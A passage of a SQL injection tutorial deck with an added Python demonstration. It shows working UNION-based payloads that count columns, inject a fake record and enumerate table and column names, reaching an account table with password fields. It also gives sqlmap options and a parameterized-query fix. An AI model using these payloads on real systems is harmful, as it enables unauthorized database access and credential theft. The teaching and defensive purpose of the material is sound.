5. If the result of the injection is visible
UNION is a nice tool
4/32
6. How many columns?
http://xxx.xxx.xxx.xxx:5000/good?
id=1 ORDER BY 5
Internal Server Error
The server encountered an internal error and was unable to
complete your request. Either the server is overloaded or there
is an error in the application.
5/32
7. Replace with a fake record
http://xxx.xxx.xxx.xxx:5000/good?
id=1 UNION SELECT 0,'1',2,3 ORDER BY 1
{"available": 3, "price": 2, "name": "1"}
6/32
9. List Table Names
http://xxx.xxx.xxx.xxx:5000/good?
id=1 UNION
SELECT 0,string_agg(table_name,','),2,3
FROM information_schema.tables
WHERE table_schema = 'public'
GROUP BY table_schema
ORDER BY 1
{"available": 3, "price": 2, "name": "goods,account,…"}
8/32
10. List Column Names
http://xxx.xxx.xxx.xxx:5000/good?
id=1 UNION
SELECT 0,string_agg(column_name,','),2,3
FROM information_schema.columns
WHERE table_name = 'account'
GROUP BY table_name
ORDER BY 1
{"available": 3, "price": 2, "name": "username,password,…"}
9/32
24. Use Placeholders
Bad sample (the id is pasted into the SQL string, so its contents become part of the query):
sql = 'select * from goods where id = {}'.format(_id)
engine.execute(sql).first()
Good sample (a bound parameter is always treated as a value, never as SQL):
from sqlalchemy import text
sql = text('select * from goods where id = :id')
engine.execute(sql, id=_id).first()
23/32
25. Use Placeholders
Bad sample (literal value concatenated into the statement):
select * from goods where id = 1;
Good sample (server-side prepared statement with a positional parameter):
prepare good_select as select * from goods where id = $1;
execute good_select(1);
24/32
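The two "Use Placeholders" slides above contrast string formatting with bound parameters. The following self-contained example (added here; it is not from the slide deck, and it uses Python's standard sqlite3 module on an in-memory database with a constructed goods table instead of the deck's SQLAlchemy/PostgreSQL setup) runs the deck's own "fake record" payload against both styles, so you can see why the parameterized version returns nothing for the injected input while the formatted version returns the attacker-controlled row.

```python
import sqlite3

# Constructed sample data: one product row, columns in the order the
# deck's JSON response suggests (id, name, price, available).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE goods (id INTEGER, name TEXT, price INTEGER, available INTEGER)"
    )
    conn.execute("INSERT INTO goods VALUES (1, 'apple', 10, 5)")
    conn.commit()
    return conn

# The payload from the deck's slide 7 ("Replace with a fake record").
FAKE_RECORD_PAYLOAD = "1 UNION SELECT 0,'1',2,3 ORDER BY 1"

def lookup_unsafe(conn, _id):
    """Bad sample: the id is formatted straight into the SQL text, so
    anything in _id is parsed as SQL by the database."""
    sql = "select id, name, price, available from goods where id = {}".format(_id)
    return conn.execute(sql).fetchone()

def lookup_safe(conn, _id):
    """Good sample: the id is passed as a bound parameter. The driver
    sends it as a value, so the UNION text is compared against the id
    column as a string and simply matches no row."""
    sql = "select id, name, price, available from goods where id = :id"
    return conn.execute(sql, {"id": _id}).fetchone()

def row_to_response(row):
    """Mimic the JSON the deck's /good endpoint returns."""
    if row is None:
        return None
    _id, name, price, available = row
    return {"available": available, "price": price, "name": name}

if __name__ == "__main__":
    conn = make_db()
    # Legitimate request: both styles return the real product.
    print(row_to_response(lookup_unsafe(conn, "1")))
    print(row_to_response(lookup_safe(conn, 1)))
    # Injected request: the formatted query returns the fake record
    # (ORDER BY 1 sorts the attacker's id=0 row first); the bound
    # parameter version returns nothing.
    print(row_to_response(lookup_unsafe(conn, FAKE_RECORD_PAYLOAD)))
    print(row_to_response(lookup_safe(conn, FAKE_RECORD_PAYLOAD)))
```

The ORDER BY 1 in the payload matters for the demonstration: without it the real row would come first and `.first()` would hide the injected one, which is exactly why the deck's payloads end with ORDER BY 1. The fix is the same in every driver: keep the SQL text constant and hand user input to the database through the driver's parameter mechanism.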
30. --banner
--technique=BEUSTQ
--level=1,2,3,4,5
GET and POST parameters are always tested;
HTTP Cookie header values are tested from level 2;
HTTP User-Agent/Referer header values are tested from level 3.
--risk=1,2,3,4
The default value is 1, which is innocuous for the majority of SQL
injection points. Risk value 2 adds the tests for heavy query
time-based SQL injections to the default level, and value 3 also adds
OR-based SQL injection tests.
--second-order=visible_page_url
Injection Configuration
29/32